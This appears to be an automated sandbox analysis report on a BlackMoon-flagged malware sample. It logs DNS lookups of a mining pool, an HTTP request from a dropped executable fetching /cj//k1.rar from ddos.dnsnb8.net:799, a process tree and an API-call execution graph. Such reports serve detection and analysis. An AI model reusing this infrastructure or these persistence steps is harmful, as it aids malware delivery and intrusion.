                                                          Jul 25, 2024 12:02:56.294533968 CEST1.1.1.1192.168.2.40xa6deNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:56.294533968 CEST1.1.1.1192.168.2.40xa6deNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:57.403168917 CEST1.1.1.1192.168.2.40x546cNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:57.403168917 CEST1.1.1.1192.168.2.40x546cNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:58.312371016 CEST1.1.1.1192.168.2.40xb349No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:58.312371016 CEST1.1.1.1192.168.2.40xb349No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:59.358144999 CEST1.1.1.1192.168.2.40x30cfNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:02:59.358144999 CEST1.1.1.1192.168.2.40x30cfNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:00.366846085 CEST1.1.1.1192.168.2.40x5a27No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:00.366846085 CEST1.1.1.1192.168.2.40x5a27No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:01.512070894 CEST1.1.1.1192.168.2.40x83dNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:01.512070894 CEST1.1.1.1192.168.2.40x83dNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:02.373325109 CEST1.1.1.1192.168.2.40x7fe4No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:02.373325109 CEST1.1.1.1192.168.2.40x7fe4No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:03.376569986 CEST1.1.1.1192.168.2.40xc838No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:03.376569986 CEST1.1.1.1192.168.2.40xc838No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:04.391307116 CEST1.1.1.1192.168.2.40x9324No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:04.391307116 CEST1.1.1.1192.168.2.40x9324No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:05.421170950 CEST1.1.1.1192.168.2.40xe1d5No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:05.421170950 CEST1.1.1.1192.168.2.40xe1d5No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:06.419838905 CEST1.1.1.1192.168.2.40x98f1No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:06.419838905 CEST1.1.1.1192.168.2.40x98f1No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:07.507802010 CEST1.1.1.1192.168.2.40x9742No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:07.507802010 CEST1.1.1.1192.168.2.40x9742No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:08.436698914 CEST1.1.1.1192.168.2.40xf52fNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:08.436698914 CEST1.1.1.1192.168.2.40xf52fNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:09.453562975 CEST1.1.1.1192.168.2.40x44e0No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:09.453562975 CEST1.1.1.1192.168.2.40x44e0No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:10.452605963 CEST1.1.1.1192.168.2.40xe3c6No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:10.452605963 CEST1.1.1.1192.168.2.40xe3c6No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:11.609930992 CEST1.1.1.1192.168.2.40xeac8No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:11.609930992 CEST1.1.1.1192.168.2.40xeac8No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:12.607680082 CEST1.1.1.1192.168.2.40xca32No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:12.607680082 CEST1.1.1.1192.168.2.40xca32No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:13.771753073 CEST1.1.1.1192.168.2.40xa468No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:13.771753073 CEST1.1.1.1192.168.2.40xa468No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:15.268265963 CEST1.1.1.1192.168.2.40x1a24No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:15.268265963 CEST1.1.1.1192.168.2.40x1a24No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:16.265567064 CEST1.1.1.1192.168.2.40x3bdfNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:16.265567064 CEST1.1.1.1192.168.2.40x3bdfNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:17.352531910 CEST1.1.1.1192.168.2.40xe995No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:17.352531910 CEST1.1.1.1192.168.2.40xe995No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:17.356199026 CEST1.1.1.1192.168.2.40xe995No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:17.356199026 CEST1.1.1.1192.168.2.40xe995No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:18.376652002 CEST1.1.1.1192.168.2.40xdc1eNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:18.376652002 CEST1.1.1.1192.168.2.40xdc1eNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:19.375041962 CEST1.1.1.1192.168.2.40x2f68No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:19.375041962 CEST1.1.1.1192.168.2.40x2f68No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:20.531657934 CEST1.1.1.1192.168.2.40xb5d4No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:20.531657934 CEST1.1.1.1192.168.2.40xb5d4No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:22.262551069 CEST1.1.1.1192.168.2.40x48f2No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:22.262551069 CEST1.1.1.1192.168.2.40x48f2No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:23.358197927 CEST1.1.1.1192.168.2.40x7ab4No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:23.358197927 CEST1.1.1.1192.168.2.40x7ab4No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:24.847480059 CEST1.1.1.1192.168.2.40xd24No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:24.847480059 CEST1.1.1.1192.168.2.40xd24No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:24.847496033 CEST1.1.1.1192.168.2.40xd24No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:24.847496033 CEST1.1.1.1192.168.2.40xd24No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.004996061 CEST1.1.1.1192.168.2.40x1a31No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.004996061 CEST1.1.1.1192.168.2.40x1a31No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.005053043 CEST1.1.1.1192.168.2.40x1a31No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.005053043 CEST1.1.1.1192.168.2.40x1a31No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.845427036 CEST1.1.1.1192.168.2.40x64f6No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:26.845427036 CEST1.1.1.1192.168.2.40x64f6No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:28.779844046 CEST1.1.1.1192.168.2.40x6922No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:28.779844046 CEST1.1.1.1192.168.2.40x6922No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:28.780181885 CEST1.1.1.1192.168.2.40x6922No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:28.780181885 CEST1.1.1.1192.168.2.40x6922No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:29.893781900 CEST1.1.1.1192.168.2.40x9868No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:29.893781900 CEST1.1.1.1192.168.2.40x9868No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:30.607336998 CEST1.1.1.1192.168.2.40x9868No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:30.607336998 CEST1.1.1.1192.168.2.40x9868No error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:31.678342104 CEST1.1.1.1192.168.2.40x425dNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:31.678342104 CEST1.1.1.1192.168.2.40x425dNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:32.697575092 CEST1.1.1.1192.168.2.40x31deNo error (0)auto.c3pool.org5.75.158.61A (IP address)IN (0x0001)false
                                                          Jul 25, 2024 12:03:32.697575092 CEST1.1.1.1192.168.2.40x31deNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                          • ddos.dnsnb8.net:799
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44973044.221.84.1057996668C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 25, 2024 11:59:27.506061077 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                          Host: ddos.dnsnb8.net:799
                                                          Connection: Keep-Alive


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:05:59:26
                                                          Start date:25/07/2024
                                                          Path:C:\Users\user\Desktop\LisectAVT_2403002B_48.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_48.exe"
                                                          Imagebase:0x400000
                                                          File size:1'133'568 bytes
                                                          MD5 hash:EEAD4E7646C126C720E4ED71A65A57E1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:05:59:26
                                                          Start date:25/07/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                          Imagebase:0xb0000
                                                          File size:15'872 bytes
                                                          MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:05:59:27
                                                          Start date:25/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper
                                                          Imagebase:0xca0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:05:59:27
                                                          Start date:25/07/2024
                                                          Path:C:\Windows\SGuard.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:-Embedding
                                                          Imagebase:0x7ff6fae80000
                                                          File size:1'119'744 bytes
                                                          MD5 hash:116A29D2FB23771FC0EF863387C51933
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:05:59:27
                                                          Start date:25/07/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:05:59:32
                                                          Start date:25/07/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                          Imagebase:0x7ff6eef20000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:05:59:32
                                                          Start date:25/07/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668
                                                          Imagebase:0x550000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:05:59:33
                                                          Start date:25/07/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640
                                                          Imagebase:0x550000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:17.3%
                                                            Dynamic/Decrypted Code Coverage:0.3%
                                                            Signature Coverage:13.6%
                                                            Total number of Nodes:1054
                                                            Total number of Limit Nodes:21
                                                            execution_graph 5810 10006b8c 5813 100011bb 5810->5813 5812 10006b94 5814 1000120a 5813->5814 5856 1000181e 5814->5856 5816 1000122d 5817 10001244 OpenSCManagerA 5816->5817 5818 10001269 5817->5818 5819 100012f9 CloseServiceHandle 5818->5819 5820 1000128d CreateServiceA 5818->5820 5822 10001325 CloseServiceHandle 5819->5822 5823 1000130e 5819->5823 5821 100012df 5820->5821 5821->5819 5824 1000133a 5822->5824 5823->5822 5825 10001592 5824->5825 5826 1000136d 5824->5826 5828 10001954 11 API calls 5825->5828 5862 10001954 5826->5862 5829 10001597 5828->5829 5832 10007680 4 API calls 5829->5832 5830 10001372 5869 10001ac1 5830->5869 5833 10001603 5832->5833 5836 100028b3 29 API calls 5833->5836 5834 100013cd 5835 10007210 13 API calls 5834->5835 5837 1000141b 5835->5837 5854 1000157d 5836->5854 5838 10007210 13 API calls 5837->5838 5839 10001446 5838->5839 5903 100025dd 5839->5903 5841 10007680 4 API calls 5842 100016d3 5841->5842 5844 100028b3 29 API calls 5842->5844 5843 10001471 5843->5854 5910 10007680 5843->5910 5847 10001705 5844->5847 5846 100014c3 5848 10001954 11 API calls 5846->5848 5849 10007680 4 API calls 5847->5849 5853 10001511 5848->5853 5850 10001778 5849->5850 5851 100028b3 29 API calls 5850->5851 5855 100017aa 5851->5855 5923 100028b3 5853->5923 5854->5841 5855->5812 5956 10007750 5856->5956 5858 10001849 5961 100018da 5858->5961 5860 1000186c GetModuleFileNameA 5861 1000188c 5860->5861 5861->5816 5965 10007790 5862->5965 5864 10001986 5865 100019b1 GetNativeSystemInfo 5864->5865 5866 100019c1 5865->5866 5970 100078c0 5866->5970 5868 10001a0d 5868->5830 5871 10001b03 5869->5871 6005 10001f4f 5871->6005 5872 10001b4f 5873 10001954 11 API calls 5872->5873 5874 10001b6f 5873->5874 5875 10001b77 5874->5875 5876 10001d0e 5874->5876 6013 10002172 GetModuleHandleA 5875->6013 5878 10001d35 RegOpenKeyExA 5876->5878 5880 10001d5f 5878->5880 5879 10001b80 5881 10001b88 RegOpenKeyExA 5879->5881 5885 10001cea 5879->5885 5883 10001d94 RegQueryValueExA 5880->5883 5880->5885 5882 10001bae 5881->5882 5901 10001ccb 5882->5901 6017 100022ec GetModuleHandleA 5882->6017 5888 10001db4 5883->5888 5885->5834 5887 10001e57 RegCloseKey 5887->5885 5888->5887 5890 10007790 4 API calls 5888->5890 5889 10001bda RegQueryValueExA 5893 10001c0b 5889->5893 5892 10001df1 5890->5892 5896 10001e20 RegQueryValueExA 5892->5896 5894 10001c97 5893->5894 5897 10007790 4 API calls 5893->5897 6021 100023de GetModuleHandleA 5894->6021 5896->5887 5899 10001e40 5896->5899 5900 10001c48 5897->5900 5898 10001cb6 RegCloseKey 5898->5901 5899->5887 5902 10001c77 RegQueryValueExA 5900->5902 6025 100024d0 GetModuleHandleA 5901->6025 5902->5894 5904 100025fe 5903->5904 5905 10002778 5904->5905 5907 10002680 5904->5907 5908 10002694 5904->5908 5906 100027b3 strstr 5905->5906 5906->5907 5907->5843 6040 100027b3 5908->6040 5911 1000769f 5910->5911 5913 100076ab 5911->5913 5914 100076de 5911->5914 5912 10007743 5912->5846 5915 10008a20 4 API calls 5913->5915 5914->5912 5916 1000771b 5914->5916 5918 100076f9 5914->5918 5917 100076d5 5915->5917 5919 10008a20 4 API calls 5916->5919 5917->5846 5920 10008a20 4 API calls 5918->5920 5921 1000773a 5919->5921 5922 10007712 5920->5922 5921->5846 5922->5846 5924 100028f0 5923->5924 5925 10001954 11 API calls 5924->5925 5926 10002979 5925->5926 5927 10002981 5926->5927 5928 10002bac 5926->5928 5929 10002172 2 API calls 5927->5929 5930 10002bd3 RegOpenKeyExA 5928->5930 5931 1000298a 5929->5931 5932 10002bff 5930->5932 5933 100029c5 RegOpenKeyExA 5931->5933 5940 10002ba7 5931->5940 5934 10002c4a RegCreateKeyExA 5932->5934 5932->5940 5935 100029f1 5933->5935 5942 10002c91 5934->5942 5936 10002b88 5935->5936 5939 100022ec 2 API calls 5935->5939 5938 100024d0 2 API calls 5936->5938 5937 10002d65 RegCloseKey 5937->5940 5938->5940 5941 10002a1d 5939->5941 5940->5854 5943 10002a50 RegCreateKeyExA 5941->5943 5942->5937 5944 10002cee RegSetValueExA 5942->5944 5951 10002a97 5943->5951 5946 10002d0e 5944->5946 5945 10002b6b 5947 100023de 2 API calls 5945->5947 5948 10002d39 RegCloseKey 5946->5948 5949 10002b73 RegCloseKey 5947->5949 5948->5937 5950 10002d4e 5948->5950 5949->5936 5950->5937 5951->5945 5952 10002af4 RegSetValueExA 5951->5952 5953 10002b14 5952->5953 5954 10002b3f RegCloseKey 5953->5954 5954->5945 5955 10002b54 5954->5955 5955->5945 5957 10007759 5956->5957 5958 1000775d 5956->5958 5957->5858 5959 10006f60 4 API calls 5958->5959 5960 10007768 5959->5960 5960->5858 5963 100018e3 GetPEB 5961->5963 5964 100018f2 5963->5964 5966 10007799 5965->5966 5967 1000779d 5965->5967 5966->5864 5976 10006f10 5967->5976 5971 100078d0 5970->5971 5973 100078e0 5971->5973 5982 10006e30 5971->5982 5975 1000796a 5973->5975 5991 100077c0 5973->5991 5975->5868 5977 10006f24 RtlAllocateHeap 5976->5977 5978 10006f19 GetProcessHeap 5976->5978 5979 10006f52 5977->5979 5980 10006f39 MessageBoxA 5977->5980 5978->5977 5979->5864 5981 10006df0 ExitProcess 5980->5981 5981->5979 5983 10006e44 5982->5983 5984 10006ea1 wsprintfA 5983->5984 5986 10006e7a wsprintfA 5983->5986 5985 10006eb6 5984->5985 5987 10006ee9 MessageBoxA 5985->5987 5988 10006efd 5985->5988 5986->5985 5987->5988 5989 10006df0 ExitProcess 5988->5989 5990 10006f04 5989->5990 5990->5973 5992 100077d3 5991->5992 5994 100077ea 5991->5994 5993 10007837 5992->5993 5992->5994 5997 1000780a 5992->5997 6000 10008a20 5993->6000 5994->5975 5996 10007846 5996->5975 5998 10008a60 4 API calls 5997->5998 5999 1000782e 5998->5999 5999->5975 6001 10008a29 6000->6001 6002 10008a2d 6000->6002 6001->5996 6003 10006f60 4 API calls 6002->6003 6004 10008a37 6003->6004 6004->5996 6006 10001f82 6005->6006 6029 10007a80 6006->6029 6008 10002117 6008->5872 6009 10001f97 6009->6008 6010 10007a80 4 API calls 6009->6010 6011 100020b2 6010->6011 6035 10007c00 6011->6035 6014 10002192 6013->6014 6015 100021a9 GetProcAddress 6013->6015 6014->6015 6016 100021c6 6015->6016 6016->5879 6018 10002323 GetProcAddress 6017->6018 6019 1000230c 6017->6019 6020 10002340 6018->6020 6019->6018 6020->5889 6022 10002415 GetProcAddress 6021->6022 6023 100023fe 6021->6023 6024 10002432 6022->6024 6023->6022 6024->5898 6026 10002507 GetProcAddress 6025->6026 6027 100024f0 6025->6027 6028 10002524 6026->6028 6027->6026 6028->5885 6030 10007a8b 6029->6030 6032 10007a91 6029->6032 6030->6009 6031 10007aa5 6031->6009 6032->6031 6033 10006f60 4 API calls 6032->6033 6034 10007ab9 6033->6034 6034->6009 6036 10007c0d 6035->6036 6037 10007c4b 6036->6037 6038 10006f60 4 API calls 6036->6038 6037->6008 6039 10007c2e 6038->6039 6039->6008 6041 100027d9 6040->6041 6042 10002822 strstr 6041->6042 6043 100027e5 6041->6043 6042->6043 6043->5907 5778 403a55 5779 403a6c 5778->5779 5788 403ada 5778->5788 5779->5788 5790 403a94 GetModuleHandleA 5779->5790 5780 403b20 5781 403ae3 GetModuleHandleA 5783 403aed 5781->5783 5783->5783 5785 403b0d GetProcAddress 5783->5785 5783->5788 5784 403a8b 5784->5783 5786 403aae GetProcAddress 5784->5786 5784->5788 5785->5788 5787 403abb VirtualProtect 5786->5787 5786->5788 5787->5788 5789 403aca VirtualProtect 5787->5789 5788->5780 5788->5781 5788->5783 5789->5788 5791 403a9d 5790->5791 5796 403ada 5790->5796 5802 403ab1 GetProcAddress 5791->5802 5793 403b20 5794 403ae3 GetModuleHandleA 5799 403aed 5794->5799 5795 403aa2 5795->5796 5797 403aae GetProcAddress 5795->5797 5796->5793 5796->5794 5796->5799 5797->5796 5798 403abb VirtualProtect 5797->5798 5798->5796 5800 403aca VirtualProtect 5798->5800 5799->5796 5801 403b0d GetProcAddress 5799->5801 5800->5796 5801->5796 5803 403ada 5802->5803 5804 403abb VirtualProtect 5802->5804 5806 403b20 5803->5806 5807 403ae3 GetModuleHandleA 5803->5807 5804->5803 5805 403aca VirtualProtect 5804->5805 5805->5803 5809 403aed 5807->5809 5808 403b0d GetProcAddress 5808->5809 5809->5803 5809->5808 6622 10005f95 6625 10005ceb 6622->6625 6626 10005d1c 6625->6626 6627 10005cfe 6625->6627 6629 10005d44 6626->6629 6630 10005d26 6626->6630 6628 10002efe SetServiceStatus 6627->6628 6631 10005d08 6628->6631 6633 10005d4e 6629->6633 6640 10005d6c 6629->6640 6632 10002efe SetServiceStatus 6630->6632 6645 10005d9a 6631->6645 6636 10005d30 6632->6636 6634 10002efe SetServiceStatus 6633->6634 6637 10005d58 6634->6637 6642 10002efe SetServiceStatus 6636->6642 6643 10002efe SetServiceStatus 6637->6643 6638 10005d0d 6639 10002efe SetServiceStatus 6638->6639 6644 10005d17 6639->6644 6641 10002efe SetServiceStatus 6640->6641 6640->6644 6641->6644 6642->6644 6643->6644 6647 10005dbb 6645->6647 6646 10005e12 OpenSCManagerA 6648 10005e33 6646->6648 6647->6646 6649 10005e57 OpenServiceA 6648->6649 6650 10005efa CloseServiceHandle 6648->6650 6652 10005e76 6649->6652 6651 10005f0f 6650->6651 6651->6638 6652->6650 6653 10005ece CloseServiceHandle 6652->6653 6653->6650 6654 10005ee3 6653->6654 6654->6650 6121 100038a2 6122 10003901 6121->6122 6125 10003597 6122->6125 6124 1000391a 6126 10007790 4 API calls 6125->6126 6127 100035de 6126->6127 6128 10003621 SHGetSpecialFolderPathW 6127->6128 6132 1000381a 6127->6132 6129 10003643 6128->6129 6130 10003671 lstrlenW 6129->6130 6144 10003667 6129->6144 6131 10003686 6130->6131 6131->6144 6145 10007de0 6131->6145 6134 10003934 GetTempPathW 6132->6134 6135 10003a05 6132->6135 6140 1000394e 6134->6140 6136 10003a37 6135->6136 6137 10003a0f 6135->6137 6139 10003597 7 API calls 6136->6139 6136->6144 6138 10003597 7 API calls 6137->6138 6138->6144 6139->6144 6141 10007de0 4 API calls 6140->6141 6140->6144 6141->6144 6142 1000370c 6143 10007de0 4 API calls 6142->6143 6143->6144 6144->6124 6146 10007dea 6145->6146 6148 10007def 6145->6148 6146->6142 6147 10007df7 6147->6142 6148->6147 6149 10006f60 4 API calls 6148->6149 6150 10007e05 6149->6150 6150->6142 6413 402168 6416 402ea0 GetModuleHandleA 6413->6416 6415 40217c 6415->6415 6417 402ec6 LoadLibraryA 6416->6417 6418 402f1b 6416->6418 6417->6418 6421 402ed3 wsprintfA 6417->6421 6419 402f5b strchr 6418->6419 6420 402f4b atoi 6418->6420 6423 402f95 6419->6423 6422 402fa5 GetProcAddress 6420->6422 6424 402f00 MessageBoxA 6421->6424 6429 402ef0 6421->6429 6425 402fb3 wsprintfA 6422->6425 6426 40301b 6422->6426 6423->6422 6427 402f14 6424->6427 6428 402fd1 6425->6428 6426->6415 6430 402210 ExitProcess 6427->6430 6431 402fe5 MessageBoxA 6428->6431 6432 402ff9 